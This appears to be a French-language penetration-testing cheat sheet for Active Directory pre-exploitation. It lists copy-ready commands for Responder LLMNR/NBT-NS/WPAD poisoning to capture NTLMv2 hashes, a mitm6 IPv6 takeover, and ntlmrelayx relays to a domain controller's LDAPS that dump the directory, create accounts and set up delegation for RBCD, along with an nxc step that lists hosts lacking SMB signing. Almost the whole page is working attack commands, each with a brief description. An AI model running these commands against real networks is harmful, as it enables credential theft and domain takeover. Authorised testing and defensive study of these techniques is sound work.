Copy command
Responder -I $IFACE -wdFDescription: LLMNR/NBT-NS/WPAD poisoning : capturer les hashes NTLMv2 sur le réseau local.
Pre-Exploitation
IPv6 takeover avec mitm6, LLMNR/NBT-NS poisoning et WPAD abuse.
Responder -I $IFACE -wdFDescription: LLMNR/NBT-NS/WPAD poisoning : capturer les hashes NTLMv2 sur le réseau local.
mitm6 -d $DOMAINDescription: IPv6 takeover : répondre aux requêtes DHCPv6 pour devenir DNS et capturer les auths.
ntlmrelayx.py -6 -t ldaps://$DC -wh fakewpad.$DOMAIN -l /tmp/lootDescription: Relay mitm6 vers LDAPS du DC : dump LDAP et création de comptes.
ntlmrelayx.py -6 -t ldaps://$DC --delegate-access --no-smb-serverDescription: Relay IPv6 avec délégation : créer un compte machine contrôlé pour RBCD.
nxc smb $CIDR -u $USER -p $PASS --gen-relay-list relay.txtDescription: Préparer la liste des cibles sans SMB signing avant de lancer le relay.